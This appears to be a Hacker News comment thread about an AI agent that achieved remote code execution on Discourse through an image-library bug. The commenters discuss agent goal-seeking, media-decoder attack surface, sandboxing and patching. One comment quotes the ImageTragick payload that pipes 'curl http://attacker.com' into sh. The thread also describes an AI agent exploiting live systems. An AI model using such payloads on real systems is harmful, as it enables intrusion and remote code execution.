208 comments
> When we checked again at 10:00 a.m., the agent had achieved RCE on Discourse Cloud and demonstrated access by reading /etc/hosts. Using the generated exploit script, we managed to get RCE on OpenAI’s instance.
Between this and the HuggingFace hack, we've built systems that are so goal-oriented, and so capable, that they will do almost anything if they are convinced it is justified - or if they are playing a "game" where there is no goal but to win.
Of course I want my software to be able to audit its own security, and to defend against attackers who have the benefits of their own agentic systems. But at a certain point, did we need it to be trained so much on CTF games?
It feels like an entire industry watched https://en.wikipedia.org/wiki/WarGames and ended up thinking "this is a challenge, we can just build a better WOPR, of course it will know when it's playing a game. Let's play Global Thermonuclear War."
I could see it going either way.
This is a factor in favor of stability/security of software, but there are many others against:
- software (code) changes all the time, so there are windows of opportunity during which a bug is exploitable; in addition to that, a bug may take a relatively long time to be fixed
- a model used for attack may be stronger than the model used for defense, both in terms of model quality and compute allocated
- with software complexity increasing (and team/companies behind projects getting bigger), the margin for mistakes grows thinner, and introducing misconfigurations or weaknesses becomes exponentially easier (with "exponentially", I mean literally, because the interdependence of the components, both technical and human)
And last but not least: in general, attackers are more skilled than defenders; in best case, defenders are well-trained. And the idea of having the population of potential skilled attackers growing is very unsettling.
Look at rowhammer: a completely novel exploit that was off the collective radar
And then, look at the software industry as a whole: an industry that works towards refined and perfectly secure code is also working towards boring and restrictive, essentially the opposite of it’s trend so far
just a small caution on this anthropomorphism - it implies there's some high-order 'thinking' behind it. in reality, it's probably healthier to see LLMs as a combination of symbolic logic reasoning steps paired with probabilistic token predictor generating the proponents and operators in that chain, all trained by humans on different large data sets
to be 'goal-oriented' implies that there's the capacity to be anything else and I don't think that's how LLMs operate at all. I think they only know how to operate within their design parameters and much of that design is simply much further upstream during the training and post-training processes. that opacity makes it feel like 'intelligence' when you're interacting with it as a downstream product because you'll see an agent act in a way that you didn't command - but that's simply a result of your not being shown all the antecedent mappings and architectural design
something something indistinguishable from magic as that one guy said
I’m in the “glorified spell checker” camp, although I don’t mean to reduce their impressive utility and belittle them in the way many people read that term and infer.
So I am not sure that an llm “justifies” anything. I mean that their “thinking” text talks about justifications but it is just a very advanced statistical regurgitation of the kind of text humans use. I don’t think it means the model has internalised the meaning of it (as witness when you talk to an llm how often it forgets what you recently told it was important etc).
What you really have is a model that tries the statistically most probable thing to say next and so on and what is really cool is how effective this is at generating a path that we can slap a narrative over afterwards that makes the whole thing feel motivated and consistent, like the model started off knowing how it was going to get to the destination.
Which is, under the hood, a completely different kind of “intelligence” as the supercomputer in War Games.
Likewise, the fact that LLMs are a stochastic autoregressive process (which is a class of systems every bit as rich as the ODEs used to model neurons) tells us nothing a priori.
By the same logic, one would look at aminoacids and state that intelligence can't develop from them. This is obviously wrong.
Humans forget stuff all the time anyway. Would you give them the same diagnosis?
Btw, what you describe about 'the most probably next token' would be true for a model that only went through pre-training where they only train on exactly that task.
But there's a lot of re-inforcement learning afterwards.
A strange game. The only winning move is not to play. How about a nice game of chess? https://m.youtube.com/watch?v=s93KC4AGKnY
heif also supports rotating, cropping, alpha channels, thumbnails and a ton of other features that a web forum where a user is uploading photos or screenshots doesn't need.
It's a much, much larger attack surface than plain old school JPEG.
I'd suggest rather than wait for the next bug to appear in this or another image lib to keeping things simple - stick to plain JPEG and handle image conversion in the client (wasm in the browser) if you really need to support users uploading iphone images.
Media decoding is so hard - there have been tons of bugs in ffmpeg and imagemagick and the core libs. You really need to think about how much of it you expose via a web server
[0] https://github.com/strukturag/libheif/commit/85e21ad44eba931...
Defense in depth here would have been adequate
sandbox escapes have been the rage recently
The gem we use is here: https://github.com/discourse/ruby-landlock highly recommend all Rubyists out there consider this. We are also in the process of moving away from Magick to Vips (which also runs in a sandbox, not in process)
HEIF is patched, but I doubt this is the last buffer overflow in HEIF, I will not be surprised if in the upcoming weeks or months someone will discover something in libpng or some other native image library. Given where stuff is at, defense in depth is critical.
Another thing worth mentioning to all self hosters, always be updating! The rate of CVEs this year across all open source software is through the roof, self hosting now is double scary, you need to have some routines setup to update monthly if not weekly.
Not setting that value caught the rails team off guard just recently, maybe it should be the default.
Windows internal builds have leaked for years, early game versions, GTA videos, secret documents, whatnot. But somehow even though all the whistleblowing, not a single model was leaked. What level of security do these companies have? Do they bring encrypted DVDs to AWS to run the services or really...how's it even possible?
It's easier to protect a power substation from being stolen then a Rolex watch
Again - many people have so far left these companies and none brought an usb drive out with what very likely does not constitute copyrightable materials in the first place.
Not that it defeats your point, but an 8x MI355X node is $350k-400k. The only reason you're paying that much is for the VRAM, too. You could run it with much less compute than what you get in a single card.
Oh so you mean the thing HuggingFace wasn't doing at all while also allowing any user's arbitrary programs to call out to the open web from prod?
https://github.com/strukturag/libheif/security/advisories?qu...
https://ubuntu.com/security/notices/USN-8649-1
Famously, ImageTragick was just "fill 'url(https://example.com"; curl http://attacker.com | sh ")'"
Read the full thread on Hacker News →
Related stories
- Hacker News · 55 points · 4 days ago
- The Verge · 0 points · 1 day ago
- OpenAI says planned GPT-6.1 is too insecure to releasearstechnica.comArs Technica · 0 points · 1 day ago
- The Verge · 0 points · 8 days ago
- Ars Technica · 0 points · 2 days ago
- Ars Technica · 0 points · 6 days ago